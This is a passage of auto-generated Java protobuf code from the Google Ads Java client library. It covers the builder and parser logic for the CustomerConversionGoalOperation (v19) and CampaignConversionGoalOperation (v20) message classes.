com.google.ads.googleads.v19.services.CustomerConversionGoalOperation.getDefaultInstance()) return this; if (other.hasUpdateMask()) { mergeUpdateMask(other.getUpdateMask()); } switch (other.getOperationCase()) { case UPDATE: { mergeUpdate(other.getUpdate()); break; } case OPERATION_NOT_SET: { break; } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage( getUpdateFieldBuilder().getBuilder(), extensionRegistry); operationCase_ = 1; break; } // case 10 case 18: { input.readMessage( getUpdateMaskFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000001; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int operationCase_ = 0; private java.lang.Object operation_; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public Builder clearOperation() { operationCase_ = 0; operation_ = null; onChanged(); return this; } private int bitField0_; private com.google.protobuf.FieldMask updateMask_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> updateMaskBuilder_; /** * <pre> * FieldMask that determines which resource fields are 
modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return Whether the updateMask field is set. */ public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return The updateMask. */ public com.google.protobuf.FieldMask getUpdateMask() { if (updateMaskBuilder_ == null) { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } else { return updateMaskBuilder_.getMessage(); } } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (value == null) { throw new NullPointerException(); } updateMask_ = value; } else { updateMaskBuilder_.setMessage(value); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask( com.google.protobuf.FieldMask.Builder builderForValue) { if (updateMaskBuilder_ == null) { updateMask_ = builderForValue.build(); } else { updateMaskBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. 
* </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder mergeUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0) && updateMask_ != null && updateMask_ != com.google.protobuf.FieldMask.getDefaultInstance()) { getUpdateMaskBuilder().mergeFrom(value); } else { updateMask_ = value; } } else { updateMaskBuilder_.mergeFrom(value); } if (updateMask_ != null) { bitField0_ |= 0x00000001; onChanged(); } return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder clearUpdateMask() { bitField0_ = (bitField0_ & ~0x00000001); updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMask.Builder getUpdateMaskBuilder() { bitField0_ |= 0x00000001; onChanged(); return getUpdateMaskFieldBuilder().getBuilder(); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { if (updateMaskBuilder_ != null) { return updateMaskBuilder_.getMessageOrBuilder(); } else { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } } /** * <pre> * FieldMask that determines which resource fields are modified in an update. 
* </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> getUpdateMaskFieldBuilder() { if (updateMaskBuilder_ == null) { updateMaskBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>( getUpdateMask(), getParentForChildren(), isClean()); updateMask_ = null; } return updateMaskBuilder_; } private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.CustomerConversionGoal, com.google.ads.googleads.v19.resources.CustomerConversionGoal.Builder, com.google.ads.googleads.v19.resources.CustomerConversionGoalOrBuilder> updateBuilder_; /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> * @return Whether the update field is set. */ @java.lang.Override public boolean hasUpdate() { return operationCase_ == 1; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> * @return The update. 
*/ @java.lang.Override public com.google.ads.googleads.v19.resources.CustomerConversionGoal getUpdate() { if (updateBuilder_ == null) { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.CustomerConversionGoal) operation_; } return com.google.ads.googleads.v19.resources.CustomerConversionGoal.getDefaultInstance(); } else { if (operationCase_ == 1) { return updateBuilder_.getMessage(); } return com.google.ads.googleads.v19.resources.CustomerConversionGoal.getDefaultInstance(); } } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> */ public Builder setUpdate(com.google.ads.googleads.v19.resources.CustomerConversionGoal value) { if (updateBuilder_ == null) { if (value == null) { throw new NullPointerException(); } operation_ = value; onChanged(); } else { updateBuilder_.setMessage(value); } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> */ public Builder setUpdate( com.google.ads.googleads.v19.resources.CustomerConversionGoal.Builder builderForValue) { if (updateBuilder_ == null) { operation_ = builderForValue.build(); onChanged(); } else { updateBuilder_.setMessage(builderForValue.build()); } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. 
* </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> */ public Builder mergeUpdate(com.google.ads.googleads.v19.resources.CustomerConversionGoal value) { if (updateBuilder_ == null) { if (operationCase_ == 1 && operation_ != com.google.ads.googleads.v19.resources.CustomerConversionGoal.getDefaultInstance()) { operation_ = com.google.ads.googleads.v19.resources.CustomerConversionGoal.newBuilder((com.google.ads.googleads.v19.resources.CustomerConversionGoal) operation_) .mergeFrom(value).buildPartial(); } else { operation_ = value; } onChanged(); } else { if (operationCase_ == 1) { updateBuilder_.mergeFrom(value); } else { updateBuilder_.setMessage(value); } } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> */ public Builder clearUpdate() { if (updateBuilder_ == null) { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; onChanged(); } } else { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; } updateBuilder_.clear(); } return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> */ public com.google.ads.googleads.v19.resources.CustomerConversionGoal.Builder getUpdateBuilder() { return getUpdateFieldBuilder().getBuilder(); } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. 
* </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v19.resources.CustomerConversionGoalOrBuilder getUpdateOrBuilder() { if ((operationCase_ == 1) && (updateBuilder_ != null)) { return updateBuilder_.getMessageOrBuilder(); } else { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.CustomerConversionGoal) operation_; } return com.google.ads.googleads.v19.resources.CustomerConversionGoal.getDefaultInstance(); } } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.CustomerConversionGoal, com.google.ads.googleads.v19.resources.CustomerConversionGoal.Builder, com.google.ads.googleads.v19.resources.CustomerConversionGoalOrBuilder> getUpdateFieldBuilder() { if (updateBuilder_ == null) { if (!(operationCase_ == 1)) { operation_ = com.google.ads.googleads.v19.resources.CustomerConversionGoal.getDefaultInstance(); } updateBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.CustomerConversionGoal, com.google.ads.googleads.v19.resources.CustomerConversionGoal.Builder, com.google.ads.googleads.v19.resources.CustomerConversionGoalOrBuilder>( (com.google.ads.googleads.v19.resources.CustomerConversionGoal) operation_, getParentForChildren(), isClean()); operation_ = null; } operationCase_ = 1; onChanged(); return updateBuilder_; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // 
@@protoc_insertion_point(builder_scope:google.ads.googleads.v19.services.CustomerConversionGoalOperation) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v19.services.CustomerConversionGoalOperation) private static final com.google.ads.googleads.v19.services.CustomerConversionGoalOperation DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v19.services.CustomerConversionGoalOperation(); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CustomerConversionGoalOperation> PARSER = new com.google.protobuf.AbstractParser<CustomerConversionGoalOperation>() { @java.lang.Override public CustomerConversionGoalOperation parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CustomerConversionGoalOperation> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CustomerConversionGoalOperation> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v19.services.CustomerConversionGoalOperation getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleads/google-ads-java
35,941
google-ads-stubs-v20/src/main/java/com/google/ads/googleads/v20/services/CampaignConversionGoalOperation.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v20/services/campaign_conversion_goal_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v20.services; /** * <pre> * A single operation (update) on a campaign conversion goal. * </pre> * * Protobuf type {@code google.ads.googleads.v20.services.CampaignConversionGoalOperation} */ public final class CampaignConversionGoalOperation extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v20.services.CampaignConversionGoalOperation) CampaignConversionGoalOperationOrBuilder { private static final long serialVersionUID = 0L; // Use CampaignConversionGoalOperation.newBuilder() to construct. private CampaignConversionGoalOperation(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CampaignConversionGoalOperation() { } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new CampaignConversionGoalOperation(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v20.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v20_services_CampaignConversionGoalOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v20.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v20_services_CampaignConversionGoalOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v20.services.CampaignConversionGoalOperation.class, com.google.ads.googleads.v20.services.CampaignConversionGoalOperation.Builder.class); } private int bitField0_; private int operationCase_ = 0; @SuppressWarnings("serial") private java.lang.Object operation_; 
public enum OperationCase implements com.google.protobuf.Internal.EnumLite, com.google.protobuf.AbstractMessage.InternalOneOfEnum { UPDATE(1), OPERATION_NOT_SET(0); private final int value; private OperationCase(int value) { this.value = value; } /** * @param value The number of the enum to look for. * @return The enum associated with the given number. * @deprecated Use {@link #forNumber(int)} instead. */ @java.lang.Deprecated public static OperationCase valueOf(int value) { return forNumber(value); } public static OperationCase forNumber(int value) { switch (value) { case 1: return UPDATE; case 0: return OPERATION_NOT_SET; default: return null; } } public int getNumber() { return this.value; } }; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public static final int UPDATE_MASK_FIELD_NUMBER = 2; private com.google.protobuf.FieldMask updateMask_; /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return Whether the updateMask field is set. */ @java.lang.Override public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return The updateMask. */ @java.lang.Override public com.google.protobuf.FieldMask getUpdateMask() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ @java.lang.Override public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { return updateMask_ == null ? 
com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } public static final int UPDATE_FIELD_NUMBER = 1; /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> * @return Whether the update field is set. */ @java.lang.Override public boolean hasUpdate() { return operationCase_ == 1; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> * @return The update. */ @java.lang.Override public com.google.ads.googleads.v20.resources.CampaignConversionGoal getUpdate() { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.CampaignConversionGoal) operation_; } return com.google.ads.googleads.v20.resources.CampaignConversionGoal.getDefaultInstance(); } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. 
* </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v20.resources.CampaignConversionGoalOrBuilder getUpdateOrBuilder() { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.CampaignConversionGoal) operation_; } return com.google.ads.googleads.v20.resources.CampaignConversionGoal.getDefaultInstance(); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (operationCase_ == 1) { output.writeMessage(1, (com.google.ads.googleads.v20.resources.CampaignConversionGoal) operation_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(2, getUpdateMask()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (operationCase_ == 1) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(1, (com.google.ads.googleads.v20.resources.CampaignConversionGoal) operation_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(2, getUpdateMask()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v20.services.CampaignConversionGoalOperation)) { return super.equals(obj); } com.google.ads.googleads.v20.services.CampaignConversionGoalOperation other = (com.google.ads.googleads.v20.services.CampaignConversionGoalOperation) obj; if (hasUpdateMask() != other.hasUpdateMask()) return 
false; if (hasUpdateMask()) { if (!getUpdateMask() .equals(other.getUpdateMask())) return false; } if (!getOperationCase().equals(other.getOperationCase())) return false; switch (operationCase_) { case 1: if (!getUpdate() .equals(other.getUpdate())) return false; break; case 0: default: } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (hasUpdateMask()) { hash = (37 * hash) + UPDATE_MASK_FIELD_NUMBER; hash = (53 * hash) + getUpdateMask().hashCode(); } switch (operationCase_) { case 1: hash = (37 * hash) + UPDATE_FIELD_NUMBER; hash = (53 * hash) + getUpdate().hashCode(); break; case 0: default: } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static 
com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseFrom( com.google.protobuf.CodedInputStream 
input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v20.services.CampaignConversionGoalOperation prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * A single operation (update) on a campaign conversion goal. * </pre> * * Protobuf type {@code google.ads.googleads.v20.services.CampaignConversionGoalOperation} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v20.services.CampaignConversionGoalOperation) com.google.ads.googleads.v20.services.CampaignConversionGoalOperationOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v20.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v20_services_CampaignConversionGoalOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v20.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v20_services_CampaignConversionGoalOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v20.services.CampaignConversionGoalOperation.class, 
com.google.ads.googleads.v20.services.CampaignConversionGoalOperation.Builder.class); } // Construct using com.google.ads.googleads.v20.services.CampaignConversionGoalOperation.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3 .alwaysUseFieldBuilders) { getUpdateMaskFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } if (updateBuilder_ != null) { updateBuilder_.clear(); } operationCase_ = 0; operation_ = null; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v20.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v20_services_CampaignConversionGoalOperation_descriptor; } @java.lang.Override public com.google.ads.googleads.v20.services.CampaignConversionGoalOperation getDefaultInstanceForType() { return com.google.ads.googleads.v20.services.CampaignConversionGoalOperation.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v20.services.CampaignConversionGoalOperation build() { com.google.ads.googleads.v20.services.CampaignConversionGoalOperation result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v20.services.CampaignConversionGoalOperation buildPartial() { com.google.ads.googleads.v20.services.CampaignConversionGoalOperation result = new com.google.ads.googleads.v20.services.CampaignConversionGoalOperation(this); if (bitField0_ != 0) { buildPartial0(result); } buildPartialOneofs(result); onBuilt(); return 
result; } private void buildPartial0(com.google.ads.googleads.v20.services.CampaignConversionGoalOperation result) { int from_bitField0_ = bitField0_; int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000001) != 0)) { result.updateMask_ = updateMaskBuilder_ == null ? updateMask_ : updateMaskBuilder_.build(); to_bitField0_ |= 0x00000001; } result.bitField0_ |= to_bitField0_; } private void buildPartialOneofs(com.google.ads.googleads.v20.services.CampaignConversionGoalOperation result) { result.operationCase_ = operationCase_; result.operation_ = this.operation_; if (operationCase_ == 1 && updateBuilder_ != null) { result.operation_ = updateBuilder_.build(); } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v20.services.CampaignConversionGoalOperation) { return mergeFrom((com.google.ads.googleads.v20.services.CampaignConversionGoalOperation)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v20.services.CampaignConversionGoalOperation other) { if (other == 
com.google.ads.googleads.v20.services.CampaignConversionGoalOperation.getDefaultInstance()) return this; if (other.hasUpdateMask()) { mergeUpdateMask(other.getUpdateMask()); } switch (other.getOperationCase()) { case UPDATE: { mergeUpdate(other.getUpdate()); break; } case OPERATION_NOT_SET: { break; } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage( getUpdateFieldBuilder().getBuilder(), extensionRegistry); operationCase_ = 1; break; } // case 10 case 18: { input.readMessage( getUpdateMaskFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000001; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int operationCase_ = 0; private java.lang.Object operation_; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public Builder clearOperation() { operationCase_ = 0; operation_ = null; onChanged(); return this; } private int bitField0_; private com.google.protobuf.FieldMask updateMask_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> updateMaskBuilder_; /** * <pre> * FieldMask that determines which resource fields are 
modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return Whether the updateMask field is set. */ public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return The updateMask. */ public com.google.protobuf.FieldMask getUpdateMask() { if (updateMaskBuilder_ == null) { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } else { return updateMaskBuilder_.getMessage(); } } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (value == null) { throw new NullPointerException(); } updateMask_ = value; } else { updateMaskBuilder_.setMessage(value); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask( com.google.protobuf.FieldMask.Builder builderForValue) { if (updateMaskBuilder_ == null) { updateMask_ = builderForValue.build(); } else { updateMaskBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. 
